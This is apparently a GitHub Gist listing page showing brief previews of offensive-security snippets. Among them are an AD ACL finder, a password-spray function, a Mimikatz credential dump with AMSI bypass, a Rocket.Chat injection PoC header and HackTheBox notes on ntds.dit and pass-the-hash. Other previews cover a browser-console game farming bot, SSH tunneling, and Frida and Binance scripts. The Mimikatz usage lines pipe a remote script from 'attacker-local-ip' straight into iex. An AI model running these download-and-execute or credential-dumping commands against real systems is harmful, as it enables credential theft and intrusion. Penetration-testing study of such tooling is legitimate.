This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Find-AclSth { | |
<# | |
.SYNOPSIS | |
Finds object ACLs in the current (or specified) domain with modification | |
rights set to non-built in objects. | |
Thanks Sean Metcalf (@pyrotek3) for the idea and guidance. | |
Author: Will Schroeder (@harmj0y) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<# | |
Author: Itamar Mizrahi (@MrAnde7son) | |
License: GNU v3 | |
Required Dependencies: None | |
Optional Dependencies: None | |
#> | |
function Invoke-LocalUserSprayAttack | |
{ | |
<# |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# TLDR: | |
# iex(wget https://gist.github.com/pich4ya/e93abe76d97bd1cf67bfba8dce9c0093/raw/e32760420ae642123599b6c9c2fddde2ecaf7a2b/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing) | |
# | |
# @author Pichaya Morimoto (p.morimoto@sth.sh) | |
# One Shot for M1m1katz PowerShell Dump All Creds with AMSI Bypass 2022 Edition | |
# (Tested and worked on Windows 10 x64 patched 2022-03-26) | |
# | |
# Usage: | |
# 1. You need a local admin user's powershell with Medium Mandatory Level (whoami /all) | |
# 2. iex(wget https://attacker-local-ip/Invoke-OneShot-Mimikatz.ps1 -UseBasicParsing) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
@author Pichaya Morimoto (p.morimoto@sth.sh) | |
Tested on Rocket.Chat 3.16.1 | |
As mentioned in https://blog.sonarsource.com/nosql-injections-in-rocket-chat | |
"Rocket.Chat has a feature called Integrations that allows creating incoming and outgoing web hooks. These web hooks can have scripts associated with them that are executed when the web hook is triggered." | |
However, no exact instruction was given. Here we go. | |
PoC: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author LongCat | |
เจอว่า htb เครื่อง Blackfield น่าจะเสียทำให้อ่าน root.txt ได้ด้วยท่าง่ายเกิน | |
(https://app.hackthebox.eu/machines/255) | |
ไอเดียเดิมคือ เราเป็น domain user (svc_backup) อยู่ในกลุ่ม Backup Operators | |
อยากจะไปอ่าน root.txt ที่เป็นของ administrator ในเฉลย official บอกไว้ 2 ท่าให้ | |
1. ใช้ wbadmin ทำ backup+restore ไฟล์ ntds.dit (ที่เก็บ ntlm ของ AD) | |
และแกะเอา ntlm มา pth เข้าไปตบ domain admin |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* run the script to a running app: frida -U "appName" -l flutter_ios.js --no-pause | |
* start app direct with the script: frida -Uf bundleIdentifier -l flutter_ios.js --no-pause | |
*/ | |
// ############################################# | |
// HELPER SECTION START | |
var colors = { | |
"resetColor": "\x1b[0m", | |
"green": "\x1b[32m", | |
"yellow": "\x1b[33m", |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# @author LongCat (p.morimoto@sth.sh) | |
# การทำ SSH Tunnel (-D, -R, -L) | |
กรณี 1: -D ทำ socks4a proxy ไปออกเน็ตที่เครื่อง ssh server | |
ทำให้เรามี proxy บนเครื่อง MacOS ที่ถ้าเราใช้ proxy นี้จะ route network ไปที่ ssh server ได้ | |
ตัวอย่างเช่น server A ต่อหา server B ได้, เราต่อหา server A ได้ แต่เราต่อหา server B โดยตรงไม่ได้ | |
ทำให้เราสามารถทำ proxy ให้เน็ตวิ่งไป server A -> server B ต่ออีกที |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// บอทปั้มเงิน TLM เกม Alien Worlds (เงินจะเอาไปแลกเงินจริงใน Binance ได้) | |
// ไว้ทดสอบเฉย ๆ อย่าเอาไปใช้จริง คนเขียนไม่รับผิดชอบต่อบั๊กใด ๆ ทั้งสิ้น | |
// | |
// วิธีใช้: | |
// 1. สมัคร + เข้า https://play.alienworlds.io/ | |
// 2. ต้องเคย mine แบบ manual ก่อน 1 ครั้ง | |
// 3. ก๊อปสคริปท์นี้ไปแปะใน Console (F12) | |
// น่าจะมีบั๊กพวก rate limit อะไรทั้งหลาย กับ if/loop บางอันเอาออกได้ | |
// ลองรันเล่น ๆ 5 ชม จาก user เปล่า ๆ ได้มา 8 TLM (ขึ้นกับดวงและอื่นๆด้วยมั่ง) | |
// ใครว่าง ๆ แก้เป็นยิงเข้า API โดยตรงไม่ผ่าน JS น่าจะเสถียรกว่าเยอะมาก |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Automatically enable Macbook Pro's Touch ID for sudo after MacOS version upgrade | |
sudotouchid () { | |
if ! /usr/bin/grep -Fq "pam_tid.so" /etc/pam.d/sudo | |
then | |
# Use Touch ID to enable Touch ID for sudo | |
/usr/bin/osascript -e 'do shell script "/usr/bin/sed -i '' -e \"1s/^//p; 1s/^.*/auth sufficient pam_tid.so/\" /etc/pam.d/sudo" with administrator privileges' | |
fi | |
} | |
sudotouchid |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- coding: utf-8 -*- | |
#!/usr/bin/env python | |
# https://python-binance.readthedocs.io/en/latest/ | |
# apt install python3-pip | |
# pip3 install python-binance requests | |
import requests | |
from binance.client import Client | |
import json | |
import decimal | |
import datetime |